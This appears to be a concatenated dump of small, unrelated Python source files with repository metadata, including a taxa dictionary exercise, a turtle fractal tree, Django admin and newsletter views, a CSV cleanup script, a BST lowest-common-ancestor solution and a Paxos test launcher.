('Microgale dobsoni', 'Afrosoricida'),
('Microgale talazaci', 'Afrosoricida'),
('Lyacon pictus', 'Carnivora'),
('Arctocephalus gazella', 'Carnivora'),
('Canis lupus', 'Carnivora'),
]
# Write a short python script to populate a dictionary called taxa_dic
# derived from taxa so that it maps order names to sets of taxa.
# E.g. 'Chiroptera' : set(['Myotis lucifugus']) etc.
# ANNOTATE WHAT EVERY BLOCK OR IF NECESSARY, LINE IS DOING!
# ALSO, PLEASE INCLUDE A DOCSTRING AT THE BEGINNING OF THIS FILE THAT
# SAYS WHAT THE SCRIPT DOES AND WHO THE AUTHOR IS
# Write your script here:
taxa_dic = {}
for species, order in taxa:
    s = taxa_dic.get(order) or set()  # the existing set for this order, or a fresh one
    s.add(species)
    taxa_dic[order] = s
print(taxa_dic)
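# Equivalent idiom (a sketch): taxa_dic.setdefault(order, set()).add(species)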
|
[
"yq3018@imperial.ac.uk"
] |
yq3018@imperial.ac.uk
|
85fc832f7949d2a610125186d9650db344d63852
|
2743b52bf0fbc7ffb3d90298c6a47bc95c097baf
|
/py2/fractal_tree_v1.1.py
|
a26eceed27b4af2709fc3e565a2214920f377887
|
[] |
no_license
|
ArvinShaffer/anaconda
|
6d1c4e41dae1436e8dc3df607322d25bb0f27221
|
8ab61c73493a1986253d0c77818beede5bb3be0f
|
refs/heads/master
| 2023-02-17T19:17:57.351454
| 2023-02-15T11:53:58
| 2023-02-15T11:53:58
| 119,800,579
| 2
| 0
| null | 2023-02-15T11:53:59
| 2018-02-01T07:36:20
|
Python
|
UTF-8
|
Python
| false
| false
| 800
|
py
|
"""
Author:Arvin Shaffer
Function:Draw a five-pointed star!
Version:1.1
Date:02/15/2018
1.1 New Function:Use iteration function draw Fractal tree
"""
import turtle
def draw_recursive_Fractal(size):
"""
Use iteration to draw a Fractal tree
:param size:
:return:
"""
if size > 5:
turtle.forward(size)
turtle.right(20)
draw_recursive_Fractal(size - 10)
turtle.left(40)
draw_recursive_Fractal(size - 10)
turtle.right(20)
turtle.backward(size)
def initial_brush():
turtle.pencolor('red')
turtle.penup()
turtle.sety(-100)
turtle.pendown()
turtle.left(90)
def main():
initial_brush()
draw_recursive_Fractal(66)
turtle.exitonclick()
if __name__ == "__main__" :
main()
|
[
"jianzhimo@sina.cn"
] |
jianzhimo@sina.cn
|
ba655956928273bdb83c374d24470b7db1bd2652
|
daa05742d81f4bb5b0385682f89eed89a97f08d2
|
/vproj/library/admin.py
|
1fff9e395bcd052b07fd45aa88308ae93372b2d1
|
[] |
no_license
|
meetakshiaggarwal/lib-proj-vib
|
b923083a973326d3ab0d56007b4bde77577bb3a0
|
505f6a6471b61365e137aed003a3938c971cca29
|
refs/heads/master
| 2021-01-10T08:08:12.417942
| 2015-11-25T16:03:33
| 2015-11-25T16:03:33
| 46,871,968
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,168
|
py
|
from django.contrib import admin
# Register your models here.
from .forms import CategoryForm
from .forms import AuthorForm
from .forms import PublisherForm
from .forms import BookForm
from .forms import HasCategoryForm
from .forms import CompiledByForm
from .forms import MemberForm
from .forms import BookCopyForm
from .forms import HistoryForm
from .forms import WaitingListForm
from .models import Category
from .models import Author
from .models import Publisher
from .models import Book
from .models import HasCategory
from .models import CompiledBy
from .models import Member
from .models import BookCopy
from .models import History
from .models import WaitingList
class CategoryAdmin(admin.ModelAdmin):
list_display = ["__unicode__", "category_id"]
form = CategoryForm
class AuthorAdmin(admin.ModelAdmin):
list_display = ["__unicode__", "author_id"]
form = AuthorForm
class PublisherAdmin(admin.ModelAdmin):
list_display = ["__unicode__", "publisher_id"]
form = PublisherForm
class BookAdmin(admin.ModelAdmin):
list_display = ["book_id","__unicode__", "isbn_no","rating", "no_of_copies"]
form = BookForm
class HasCategoryAdmin(admin.ModelAdmin):
list_display = ["__unicode__"]
form = HasCategoryForm
class CompiledByAdmin(admin.ModelAdmin):
list_display = ["book_id","author_id","publisher_id"]
form = CompiledByForm
class MemberAdmin(admin.ModelAdmin):
# list_display = ["first_name","last_name","phone","email","date_of_joining","reference_id"]
form = MemberForm
class BookCopyAdmin(admin.ModelAdmin):
form = BookCopyForm
class HistoryAdmin(admin.ModelAdmin):
form = HistoryForm
class WaitingListAdmin(admin.ModelAdmin):
form = WaitingListForm
# admin.site.register(SignUp,SignUpAdmin)
admin.site.register(Category,CategoryAdmin)
admin.site.register(Author, AuthorAdmin)
admin.site.register(Publisher,PublisherAdmin)
admin.site.register(Book,BookAdmin)
admin.site.register(HasCategory,HasCategoryAdmin)
admin.site.register(CompiledBy,CompiledByAdmin)
admin.site.register(Member, MemberAdmin)
admin.site.register(BookCopy,BookCopyAdmin)
admin.site.register(History,HistoryAdmin)
admin.site.register(WaitingList,WaitingListAdmin)
|
[
"meetakshi17@gmail.com"
] |
meetakshi17@gmail.com
|
111111693155ec12ab89d1259913c5984ac0ba31
|
42fe73b2ef271565c60f633af1be8344d7966350
|
/JD_spider/fit.py
|
652589ab787aeac9e577d5902c8720004bb995b9
|
[] |
no_license
|
ElecEyeCk/EEC
|
ce475f988d2c7a0391d89749a301760664c4c41f
|
8d3a6734abf953a40b9792f8420b5799e649e7b4
|
refs/heads/master
| 2023-08-05T23:41:09.681636
| 2021-09-27T04:53:20
| 2021-09-27T04:53:20
| 382,285,623
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,012
|
py
|
import pandas as pd
import csv
file_path = "C:/Users/王羽钧/Desktop/大三下/软件工程课设/数据集/7-6/JD_Phone6.csv"
csv_file = pd.read_csv(file_path)
commit_list = csv_file['commit'].copy()
name_list = csv_file['name'].copy()
adr_list = csv_file['adr'].copy()
price_list = csv_file['price'].copy()
shop_list = csv_file['shop'].copy()
icons_list = csv_file['icons'].copy()
for i in range(0,len(name_list)):
name_list[i] = name_list[i].replace("\n", "")
with open(file_path, 'w', newline='', encoding='utf-8-sig') as f:
fieldnames = ["adr", "name", "price", "commit", "shop", "icons"]
f_csv = csv.DictWriter(f, fieldnames=fieldnames)
f_csv.writeheader()
for i in range(0, len(commit_list)):
f_csv.writerow(
{
"adr": adr_list[i],
"name": name_list[i],
"price": price_list[i],
"commit": commit_list[i],
"shop": shop_list[i],
"icons": icons_list[i]
}
)
f.close()
|
[
"44989275+Alex3der@users.noreply.github.com"
] |
44989275+Alex3der@users.noreply.github.com
|
3c2b72b64a2ab17b8dd5de8c68068bafa6824716
|
c8c021af70365b9079ef637bbd560d3dd3d10e8c
|
/.venv/bin/pip3
|
bfa2475ae3903112cbe673bbf474f340484f9751
|
[] |
no_license
|
pkunwu/whattoeat
|
064d79f3ead360974e9cb8e7e117d6eeaab07e30
|
1991d03bea1c883e863a3a0839ffc77d552bebba
|
refs/heads/master
| 2023-06-21T22:16:12.260242
| 2021-07-22T02:15:05
| 2021-07-22T02:15:05
| 355,035,234
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 270
|
#!/home/chenliang/Documents/Programming/WhatToEat/.venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal.cli.main import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"pkunwu@gmail.com"
] |
pkunwu@gmail.com
|
|
d0f8333b966b57a0edb2b0537c142c13a7cbbac7
|
cd98f3e273da6b8117b9c3069eff5321939055fc
|
/Python/ErrorsAndExceptions/Exceptions/solution.py
|
8f7e165d2eb17cdc3453d5f3f803b13437013a4d
|
[] |
no_license
|
dev-11/HackerRankSolutions
|
86a3d6ad4f014b4022348c9bd3a573c729805f6a
|
f2c33dc359a55bae4d7f8921a46d4261f9dfa515
|
refs/heads/master
| 2021-06-24T17:30:59.834850
| 2019-07-25T19:23:52
| 2019-07-25T19:23:52
| 114,654,051
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 157
|
py
|
for i in range(int(input())):
try:
a,b = map(int,input().split())
print(a//b)
except Exception as e:
print("Error Code:",e)
|
[
"giotto007@gmail.com"
] |
giotto007@gmail.com
|
6bb7901debec9f9ddd547ba4fb9d52462ca74c58
|
fa45fe7eaba7ef7c27ecf95db7c460ca189ce0d4
|
/everydays/BookBeingRead/python高级编程/day12.1.py
|
0d2033516213b11dfa91ea44119d6e37e17ceb4c
|
[] |
no_license
|
jake20001/Hello
|
be1a2bb5331f2ad4c1d8f30c6a9a530aff79e605
|
08217871bb17152eb09e68cd154937ebe5d59d2c
|
refs/heads/master
| 2021-07-10T09:48:15.883716
| 2021-04-23T14:49:03
| 2021-04-23T14:49:03
| 56,282,358
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 774
|
py
|
# -*- coding:utf-8 -*-
# -------------------------------
# ProjectName : autoDemo
# Author : zhangjk
# CreateTime : 2020/12/18 11:05
# FileName : day12.1
# Description :
# --------------------------------
import os
class DublinCoreAdapter(object):
def __init__(self,filename):
self._filename = filename
def title(self):
return os.path.splitext(self._filename)[0]
def creater(self):
return "Someone"
def language(self):
return ('en',)
class DublinCoreInfo(object):
def summary(self,dc_ob):
print('Title %s'%dc_ob.title())
print('Create %s'%dc_ob.creater())
        print('Language %s'%','.join(dc_ob.language()))
adapter = DublinCoreAdapter('1.txt')
infos = DublinCoreInfo()
infos.summary(adapter)
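# Adapter pattern: DublinCoreInfo.summary() only assumes the Dublin Core
# interface (title/creater/language), so any object exposing it works.
# Expected output for the '1.txt' adapter:
#   Title 1
#   Create Someone
#   Language en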
|
[
"jianke.zhang@beantechs.com"
] |
jianke.zhang@beantechs.com
|
0d47dd61b2368620cb8f0061a923c73cc7be140f
|
5b0c9ebe1576fdf6fcc1abf8d5c781fdc0aab591
|
/test3.py
|
82be98b389109e219d53f572d236b1c6bea018b0
|
[] |
no_license
|
Alex-kaer/paxos-edu
|
de7dc072cc159e175d6facbe0cbffb553d6606d6
|
4036adc76ff476b6d86605ba177793f2c668defa
|
refs/heads/master
| 2020-03-31T12:02:50.210231
| 2018-08-23T21:11:32
| 2018-08-23T21:16:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 238
|
py
|
from paxos import run_cli
hosts_ports = (
('127.0.0.1', '8881'),
('127.0.0.1', '8882'),
('127.0.0.1', '8883'),
('127.0.0.1', '8884'),
('127.0.0.1', '8885'),
)
run_cli(*hosts_ports[2], hosts_ports, hosts_ports[2][1])
|
[
"jimzuolin@gmail.com"
] |
jimzuolin@gmail.com
|
4422f7d5921e314273bf3e365ade27b53d14f1d0
|
053c7e3649fa0e7b9fee1d575227f3df3dc9514e
|
/venv/lib/python3.7/rlcompleter.py
|
7d314a0e11ceea9c8379850d542c51282747dc59
|
[] |
no_license
|
brady19990517/bottletest
|
2908d489929f50224047893809fd56c5484f14f0
|
038cd7dfa1bed30a0a92369e735ce6427daec690
|
refs/heads/master
| 2022-06-13T17:05:59.187688
| 2019-07-29T08:13:26
| 2019-07-29T08:13:26
| 199,409,471
| 0
| 0
| null | 2022-06-03T22:45:16
| 2019-07-29T08:17:52
|
Python
|
UTF-8
|
Python
| false
| false
| 51
|
py
|
/Users/bpeng/anaconda3/lib/python3.7/rlcompleter.py
|
[
"dearbrady19990517@gmail.com"
] |
dearbrady19990517@gmail.com
|
0825d679a4a233d1b744c5a713dd44acfafe47e4
|
4e8b2390820525051aaca421e657b4bbb7c86eb2
|
/querysys/url.py
|
26479b9e915c2788199e20bb841a6ac135cfa39f
|
[] |
no_license
|
HandsomeCodeMan123/StudentManage
|
837a461ee08db16d59b7117d4a4ba7d75b5f2fb9
|
7560aaf97e3442d1e682d9b7e64b162856552321
|
refs/heads/master
| 2023-04-01T18:44:43.839067
| 2021-04-01T13:53:03
| 2021-04-01T13:53:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 157
|
py
|
from django.urls import path
from querysys.views import index,addstudent
urlpatterns = [
path('index/', index),
path('addstudent/', addstudent),
]
|
[
"291882490@qq.com"
] |
291882490@qq.com
|
12036ced2dc9a7de9f3d4d79fc1ad4e7fbcbe6cd
|
8fef8af953e8dafde78c671e8ee9813d08ab2d60
|
/trees/BST/LowestCommAncestor.py
|
f1e104c3496e69731c8a6af520b879abc8aa4736
|
[
"MIT"
] |
permissive
|
htrahddis-hub/DSA-Together-HacktoberFest
|
037b009c744863070e0f1b61167c18f9101335f2
|
a5c6165c449c5b5b91e56815f2a38d5fd23bf354
|
refs/heads/main
| 2023-08-23T18:52:55.654386
| 2021-10-17T15:45:14
| 2021-10-17T15:45:14
| 418,180,825
| 1
| 0
|
MIT
| 2021-10-17T15:56:21
| 2021-10-17T15:56:21
| null |
UTF-8
|
Python
| false
| false
| 2,808
|
py
|
# Link to the problem :https://practice.geeksforgeeks.org/problems/lowest-common-ancestor-in-a-bst/1#
#Function to find the lowest common ancestor in a BST.
# We are looking for a node which is closest to both the nodes
def LCA(root, n1, n2):
#code here.
while(root):
# If the root is greater than both nodes , then we are looking for something smaller , so go to left
if(root.data > n1 and root.data > n2):
root = root.left
# If the root is smaller than both nodes , then we are looking for something greater than this and go to right
elif(root.data < n1 and root.data < n2):
root = root.right
        # If the root is neither greater nor smaller, it lies between n1 and n2, so it is the LCA; stop searching
else:
break
return root
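# Runs in O(h) time, where h is the height of the BST: every iteration of the
# loop descends exactly one level toward the split point.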
#{
# Driver Code Starts
#Initial Template for Python 3
from collections import deque
# Tree Node
class Node:
def __init__(self, val):
self.right = None
self.data = val
self.left = None
# Function to Build Tree
def buildTree(s):
#Corner Case
if(len(s)==0 or s[0]=="N"):
return None
# Creating list of strings from input
# string after spliting by space
ip=list(map(str,s.split()))
# Create the root of the tree
root=Node(int(ip[0]))
size=0
q=deque()
# Push the root to the queue
q.append(root)
size=size+1
# Starting from the second element
i=1
while(size>0 and i<len(ip)):
# Get and remove the front of the queue
currNode=q[0]
q.popleft()
size=size-1
# Get the current node's value from the string
currVal=ip[i]
# If the left child is not null
if(currVal!="N"):
# Create the left child for the current node
currNode.left=Node(int(currVal))
# Push it to the queue
q.append(currNode.left)
size=size+1
# For the right child
i=i+1
if(i>=len(ip)):
break
currVal=ip[i]
# If the right child is not null
if(currVal!="N"):
# Create the right child for the current node
currNode.right=Node(int(currVal))
# Push it to the queue
q.append(currNode.right)
size=size+1
i=i+1
return root
if __name__=="__main__":
t=int(input())
for _ in range(0,t):
s=input()
root=buildTree(s)
n1,n2=list(map(int,input().split()))
print(LCA(root,n1,n2).data);
# } Driver Code Ends
|
[
"dsrao0712@gmail.com"
] |
dsrao0712@gmail.com
|
7193b1ee65106633518983747b93915b9493a142
|
f706a4fe6663e1e51f2393f69927fec7c2275b10
|
/src/newsletter/views.py
|
7225378ed79727bd2e6643723fa84cdae8fbd671
|
[] |
no_license
|
Dipenjethva19/HappyFace_MVP_Newsletter_App
|
6106175b97db346246c937ae84f66d79df33c7d7
|
61d22ac9ce6caccb9d58d6ded93d134b0edfeb1a
|
refs/heads/master
| 2022-11-09T01:14:29.746277
| 2017-06-07T20:33:14
| 2017-06-07T20:33:14
| 93,466,717
| 0
| 1
| null | 2022-10-27T03:52:30
| 2017-06-06T02:24:37
|
Python
|
UTF-8
|
Python
| false
| false
| 2,598
|
py
|
from django.conf import settings
from django.shortcuts import render
from .forms import ContactForm, SignUpForm
from django.core.mail import send_mail
from .models import SignUp
# Create your views here.
def home(request):
title = 'Sign Up Now'
# if request.user.is_authenticated:
# title = 'Welcome To my App. %s' % request.user
# if request.method == 'POST':
# print(request.POST)
form = SignUpForm(request.POST or None)
context = {
'title': title,
'form': form
}
if form.is_valid():
instance = form.save(commit=False)
full_name = form.cleaned_data.get("full_name")
if not full_name:
full_name = "new any user"
instance.full_name = full_name
# if not instance.full_name:
# instance.full_name = 'Any User'
form.save()
context = {
"title": 'Thank You'
}
if request.user.is_authenticated() and request.user.is_staff:
for instance in SignUp.objects.all():
print(instance.email)
queryset = SignUp.objects.all()
context = {
'queryset': queryset
}
return render(request, "home.html", context)
def contact(request):
title = 'Contact Us'
form = ContactForm(request.POST or None)
    if form.is_valid():
        # read the cleaned fields directly; looping over cleaned_data is unnecessary
        form_email = form.cleaned_data.get('email')
        form_message = form.cleaned_data.get('message')
        form_full_name = form.cleaned_data.get('full_name')
some_html_message = """
<h1>Hello</h1>
"""
# print(email,message,full_name)
subject = 'EmailTesting'
from_email = settings.EMAIL_HOST_USER
to_email = [from_email, ]
contact_message = "%s: %s via %s" % (
form_full_name,
form_message,
form_email
)
send_mail(
subject,
contact_message,
from_email,
to_email,
html_message=some_html_message,
fail_silently=False
)
send_mail(
'Subject here',
'Here is the message.',
'from@example.com',
['to@example.com'],
fail_silently=False,
)
context = {
'form': form,
'title': title
}
return render(request, 'forms.html', context)
|
[
"dipenjethva19@gmail.com"
] |
dipenjethva19@gmail.com
|
ce2059c2fc6ac68411c1e74a87f22ee1b3a945ba
|
330491e45677af7dc41525336296b3f322a146e6
|
/data_collection/svcca_test_scan.py
|
f34105ef9c989289953072f079e04d3f3a04d7ea
|
[] |
no_license
|
arnupretorius/betterInitAtLimitedDepth_2019
|
c8eff9ad6340a0b8f8f30897684cc31158189c9d
|
a3488aba6f0003892f72e61f659178a4758061b4
|
refs/heads/master
| 2020-07-03T03:53:23.904397
| 2019-08-11T14:44:36
| 2019-08-11T14:44:36
| 201,775,497
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,024
|
py
|
import sys, os
import numpy as np
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), '..'))
from src.utils import load_model, get_experiment_dicts
TEST_LIST_DIRECTORY = "{}/temp/".format(os.path.dirname(os.path.abspath(__file__)))
TEST_LIST_PATH = "{}/test_list.txt".format(TEST_LIST_DIRECTORY)
TEST_DICT_PATH = "{}/test_dict.npz".format(TEST_LIST_DIRECTORY)
def write_details_to_file(dictionary, dict_index, keys=[]):
for key in dictionary:
if isinstance(dictionary[key], dict):
write_details_to_file(dictionary[key], dict_index, keys + [key])
elif isinstance(dictionary[key], list):
final_epoch_model_path = os.path.abspath(dictionary[key][-1])
# write to file (append)
with open(TEST_LIST_PATH, "a") as test_list_file:
[noise_type, noise_level, hyperparam_index], init_index = keys, key
test_list_file.write(
"{dict_index} {noise_type} {noise_level} {hyperparam_index} {init_index}\n".format(
dict_index=dict_index, noise_type=noise_type, noise_level=noise_level,
hyperparam_index=hyperparam_index, init_index=init_index
)
)
else:
raise ValueError("The dictionary provided to the write_final_epoch_path_to_file function was not in the correct format.")
if __name__ == "__main__":
root_dir = '../results/mnist'
experiment_dicts = get_experiment_dicts(root_dir)
paths_per_experiment_dict = []
for experiment_dict in experiment_dicts:
model_paths = load_model(experiment_dict, path_to_results=root_dir)
paths_per_experiment_dict.append(model_paths)
os.makedirs(TEST_LIST_DIRECTORY, exist_ok=True)
open(TEST_LIST_PATH, "w").close()
np.savez_compressed(TEST_DICT_PATH, data=paths_per_experiment_dict)
for index, dictionary in enumerate(paths_per_experiment_dict):
write_details_to_file(dictionary, dict_index=index)
|
[
"arnupretorius@gmail.com"
] |
arnupretorius@gmail.com
|
1eba6ca236ff4f6105330a8c2c4442d3537a21a8
|
00b762e37ecef30ed04698033f719f04be9c5545
|
/scripts/test_results/scikit-learn_test_results/conflicts/52_bench_sgd_covertype_actual.py
|
f88cf076b4bf0da384e6c9ba249ccf1ec8f143b1
|
[] |
no_license
|
kenji-nicholson/smerge
|
4f9af17e2e516333b041727b77b8330e3255b7c2
|
3da9ebfdee02f9b4c882af1f26fe2e15d037271b
|
refs/heads/master
| 2020-07-22T02:32:03.579003
| 2018-06-08T00:40:53
| 2018-06-08T00:40:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,491
|
py
|
"""
================================
Covertype dataset with dense SGD
================================
Benchmark stochastic gradient descent (SGD), Liblinear, and Naive Bayes, CART
(decision tree), RandomForest and Extra-Trees on the forest covertype dataset of
Blackard, Jock, and Dean [1]. The dataset comprises 581,012 samples. It is low-
dimensional with 54 features and a sparsity of approx. 23%. Here, we consider
the task of predicting class 1 (spruce/fir). The classification performance of
SGD is competitive with Liblinear while being two orders of magnitude faster to
train::
[..]
Classification performance:
===========================
Classifier train-time test-time error-rate
--------------------------------------------
Liblinear 11.8977s 0.0285s 0.2305
GaussianNB 3.5931s 0.6645s 0.6367
SGD 0.2924s 0.0114s 0.2300
CART 39.9829s 0.0345s 0.0476
RandomForest 794.6232s 1.0526s 0.0249
Extra-Trees 1401.7051s 1.1181s 0.0230
The same task has been used in a number of papers including:
* `"SVM Optimization: Inverse Dependence on Training Set Size"
<http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.139.2112>`_
S. Shalev-Shwartz, N. Srebro - In Proceedings of ICML '08.
* `"Pegasos: Primal estimated sub-gradient solver for svm"
<http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.74.8513>`_
S. Shalev-Shwartz, Y. Singer, N. Srebro - In Proceedings of ICML '07.
* `"Training Linear SVMs in Linear Time"
<www.cs.cornell.edu/People/tj/publications/joachims_06a.pdf>`_
T. Joachims - In SIGKDD '06
[1] http://archive.ics.uci.edu/ml/datasets/Covertype
To run this example use your favorite python shell::
% ipython benchmark/bench_sgd_covertype.py
"""
from __future__ import division
print __doc__
# Author: Peter Prettenhoer <peter.prettenhofer@gmail.com>
# License: BSD Style.
# $Id$
from time import time
import os
import numpy as np
from sklearn.svm import LinearSVC
from sklearn.linear_model import SGDClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier
from sklearn.ensemble.gradient_boosting import GradientBoostingClassifier
from sklearn import metrics
######################################################################
## Download the data, if not already on disk
if not os.path.exists('covtype.data.gz'):
# Download the data
import urllib
print "Downloading data, Please Wait (11MB)..."
opener = urllib.urlopen(
'http://archive.ics.uci.edu/ml/'
'machine-learning-databases/covtype/covtype.data.gz')
open('covtype.data.gz', 'wb').write(opener.read())
######################################################################
## Load dataset
print("Loading dataset...")
import gzip
f = gzip.open('covtype.data.gz')
X = np.fromstring(f.read().replace(",", " "), dtype=np.float64, sep=" ",
count=-1)
X = X.reshape((581012, 55))
f.close()
# class 1 vs. all others.
y = np.ones(X.shape[0]) * -1
y[np.where(X[:, -1] == 1)] = 1
X = X[:, :-1]
######################################################################
## Create train-test split (as [Joachims, 2006])
print("Creating train-test split...")
idx = np.arange(X.shape[0])
np.random.seed(13)
np.random.shuffle(idx)
train_idx = idx[:522911]
test_idx = idx[522911:]
X_train = X[train_idx]
y_train = y[train_idx]
X_test = X[test_idx]
y_test = y[test_idx]
# free memory
del X
del y
######################################################################
## Standardize first 10 features (the numerical ones)
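# (setting mean=0 and std=1 for columns 10+ makes the scaling below a no-op on
# the binary wilderness-area / soil-type indicator columns)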
mean = X_train.mean(axis=0)
std = X_train.std(axis=0)
mean[10:] = 0.0
std[10:] = 1.0
X_train = (X_train - mean) / std
X_test = (X_test - mean) / std
######################################################################
## Print dataset statistics
print("")
print("Dataset statistics:")
print("===================")
print("%s %d" % ("number of features:".ljust(25),
X_train.shape[1]))
print("%s %d" % ("number of classes:".ljust(25),
np.unique(y_train).shape[0]))
print("%s %d (%d, %d)" % ("number of train samples:".ljust(25),
X_train.shape[0], np.sum(y_train == 1),
np.sum(y_train == -1)))
print("%s %d (%d, %d)" % ("number of test samples:".ljust(25),
X_test.shape[0], np.sum(y_test == 1),
np.sum(y_test == -1)))
print("")
print("Training classifiers...")
print("")
######################################################################
## Benchmark classifiers
def benchmark(clf):
t0 = time()
clf.fit(X_train, y_train)
train_time = time() - t0
t0 = time()
pred = clf.predict(X_test)
test_time = time() - t0
err = metrics.zero_one(y_test, pred) / float(pred.shape[0])
return err, train_time, test_time
######################################################################
## Train Liblinear model
liblinear_parameters = {
'loss': 'l2',
'penalty': 'l2',
'C': 1000,
'dual': False,
'tol': 1e-3,
}
liblinear_res = benchmark(LinearSVC(**liblinear_parameters))
liblinear_err, liblinear_train_time, liblinear_test_time = liblinear_res
######################################################################
## Train GaussianNB model
gnb_err, gnb_train_time, gnb_test_time = benchmark(GaussianNB())
######################################################################
## Train SGD model
sgd_parameters = {
'alpha': 0.001,
'n_iter': 2,
}
sgd_err, sgd_train_time, sgd_test_time = benchmark(SGDClassifier(
**sgd_parameters))
## Train CART model
cart_err, cart_train_time, cart_test_time = benchmark(
    DecisionTreeClassifier(min_split=5,
                           max_depth=None))
######################################################################
## Train RandomForest model
## (parameters here are analogous to the CART run above)
rf_err, rf_train_time, rf_test_time = benchmark(
    RandomForestClassifier(n_estimators=20, min_split=5))
######################################################################
## Train Extra-Trees model
et_err, et_train_time, et_test_time = benchmark(
    ExtraTreesClassifier(n_estimators=20, min_split=5))
######################################################################
## print("Training GB model")
## gb_err, gb_train_time, gb_test_time = benchmark(
##     GradientBoostingClassifier(min_split=5, max_depth=10, n_iter=20,
##                                learn_rate=.8, subsample=0.5))
######################################################################
## Print classification performance
print("")
print("Classification performance:")
print("===========================")
print("")
def print_row(clf_type, train_time, test_time, err):
    print("%s %s %s %s" % (clf_type.ljust(12),
                           ("%.4fs" % train_time).center(10),
                           ("%.4fs" % test_time).center(10),
                           ("%.4f" % err).center(10)))
print("%s %s %s %s" % ("Classifier ", "train-time", "test-time",
                       "error-rate"))
print("-" * 44)
print_row("Liblinear", liblinear_train_time, liblinear_test_time,
          liblinear_err)
print_row("GaussianNB", gnb_train_time, gnb_test_time, gnb_err)
print_row("SGD", sgd_train_time, sgd_test_time, sgd_err)
print_row("CART", cart_train_time, cart_test_time, cart_err)
print_row("RandomForest", rf_train_time, rf_test_time, rf_err)
print_row("Extra-Trees", et_train_time, et_test_time, et_err)
## print_row("GB", gb_train_time, gb_test_time, gb_err)
print("")
print("")
|
[
"srhee4@cs.washington.edu"
] |
srhee4@cs.washington.edu
|
425bddbdd429969023d4fdd888c1097c5b7142ee
|
1b30b1d8f8f0903052ae65af48daed3866ee7fde
|
/swagger_client/models/tpo_data_dt_os_controller_parameters_lab_request_parameter.py
|
7e8d05bce4bbbf2abe8ce6ef8425e0b464eceba5
|
[] |
no_license
|
my-workforce/TMB-SDK
|
206ff87242c13abdfd8fecbeda25b0499550f42b
|
bea9e8dd82240c30f7809b052a4a612202d4e607
|
refs/heads/main
| 2023-03-31T18:11:01.735690
| 2021-03-31T13:00:49
| 2021-03-31T13:00:49
| 353,358,046
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,648
|
py
|
# coding: utf-8
"""
Transaction Management Bus (TMB) API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: V3.2.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class TpoDataDTOsControllerParametersLabRequestParameter(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'lab_request': 'TpoDataDTOsLabLabRequestDTO'
}
attribute_map = {
'lab_request': 'LabRequest'
}
def __init__(self, lab_request=None): # noqa: E501
"""TpoDataDTOsControllerParametersLabRequestParameter - a model defined in Swagger""" # noqa: E501
self._lab_request = None
self.discriminator = None
self.lab_request = lab_request
@property
def lab_request(self):
"""Gets the lab_request of this TpoDataDTOsControllerParametersLabRequestParameter. # noqa: E501
:return: The lab_request of this TpoDataDTOsControllerParametersLabRequestParameter. # noqa: E501
:rtype: TpoDataDTOsLabLabRequestDTO
"""
return self._lab_request
@lab_request.setter
def lab_request(self, lab_request):
"""Sets the lab_request of this TpoDataDTOsControllerParametersLabRequestParameter.
:param lab_request: The lab_request of this TpoDataDTOsControllerParametersLabRequestParameter. # noqa: E501
:type: TpoDataDTOsLabLabRequestDTO
"""
if lab_request is None:
raise ValueError("Invalid value for `lab_request`, must not be `None`") # noqa: E501
self._lab_request = lab_request
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(TpoDataDTOsControllerParametersLabRequestParameter, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, TpoDataDTOsControllerParametersLabRequestParameter):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"fodeh@i3hub.com"
] |
fodeh@i3hub.com
|
516ddce9995ee16a9c3d14b282864b36283da25f
|
0805420ce1890c36aa9e0cc1a782945464433ef6
|
/client/eve/common/lib/eveLocalization/__init__.py
|
a26d9acf4f873ae1332caf2913e0b18ee75e8119
|
[] |
no_license
|
cnrat/dec-eve-serenity
|
4ebc3b2ab8faa6e6714dbb72b7ebcf92c4b2d75c
|
37519e66a5fbb0d7c417d5cf9778636991efbed8
|
refs/heads/master
| 2021-01-21T03:39:48.969227
| 2016-08-10T05:25:07
| 2016-08-10T05:25:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 211
|
py
|
# Python bytecode 2.7 (decompiled from Python 2.7)
